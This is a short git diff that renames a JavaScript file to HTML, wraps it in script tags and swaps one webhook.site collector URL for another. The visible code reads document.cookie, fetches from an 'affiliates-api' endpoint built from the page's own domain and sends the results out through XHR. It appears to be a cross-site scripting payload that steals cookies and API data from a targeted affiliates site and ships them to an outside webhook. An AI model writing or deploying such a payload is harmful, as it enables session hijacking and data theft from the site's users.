Update and rename vi11.js to vi11.html

--- a/vi11.html
+++ b/vi11.html
@@ -1,6 +1,8 @@
+<script>
+
 const dataToSend = {
 };
-var url = "https://webhook.site/abc755e8-f117-4694-b6d8-87df15b1e4f4";
+var url = "https://webhook.site/bb3e9fcc-4312-4ce0-b936-030fe6201789";
 
 function getCookie(name) {
   const cookies = document.cookie.split('; ');
@@ -747,3 +749,5 @@ fetch('https://'+document.domain.replace("affiliates","affiliates-api")+'/api2/a
       xhr.send();
    }) 
 })();
+
+</script>
